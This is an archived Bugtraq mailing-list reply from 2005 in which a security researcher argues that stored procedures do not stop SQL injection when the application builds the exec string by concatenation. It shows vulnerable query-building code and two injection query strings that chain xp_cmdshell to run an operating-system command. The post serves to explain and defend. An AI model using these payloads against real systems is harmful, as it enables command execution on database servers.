Bugtraq mailing list archives

RE: Paper: SQL Injection Attacks by Example

From: "David Litchfield" <davidl () ngssoftware com>
Date: Wed, 5 Jan 2005 21:09:06 -0000

David,
Actually, to nitpick your comment a bit, stored procedures usually have

typed input variables:

create procedure foo ( a int, b varchar(20) ) as ...


This has no bearing on the issue.

If from the code of the app I perform something like

strSQL = "exec foo(" & request.querystring("a") & "," &
request.querystring("b") & ")"
Conn.execute(strSQL)

then I can either set a in the query string to

?a=1,'foo');exec+master..xp_cmdshell+'dir'--&b=foo

Or alternatively I can set b in the query string to

?a=1&b=foo');exec+master..xmp_cmdshell+'dir'--

Either way I'm using a stored procedure and I can inject into the app.

Cheers,
David

Current thread:

Paper: SQL Injection Attacks by Example Steve Friedl (Jan 05)
- RE: Paper: SQL Injection Attacks by Example David Litchfield (Jan 05)
- <Possible follow-ups>
- RE: Paper: SQL Injection Attacks by Example Scovetta, Michael V (Jan 05)
  - Re: Paper: SQL Injection Attacks by Example Chip Andrews (Jan 05)
  - Re: Paper: SQL Injection Attacks by Example Cory Foy (Jan 05)
  - RE: Paper: SQL Injection Attacks by Example David Litchfield (Jan 05)
- RE: Paper: SQL Injection Attacks by Example Michael Silk (Jan 05)
- RE: Paper: SQL Injection Attacks by Example Scovetta, Michael V (Jan 05)
- RE: Paper: SQL Injection Attacks by Example Sergey Chernyshev (Jan 06)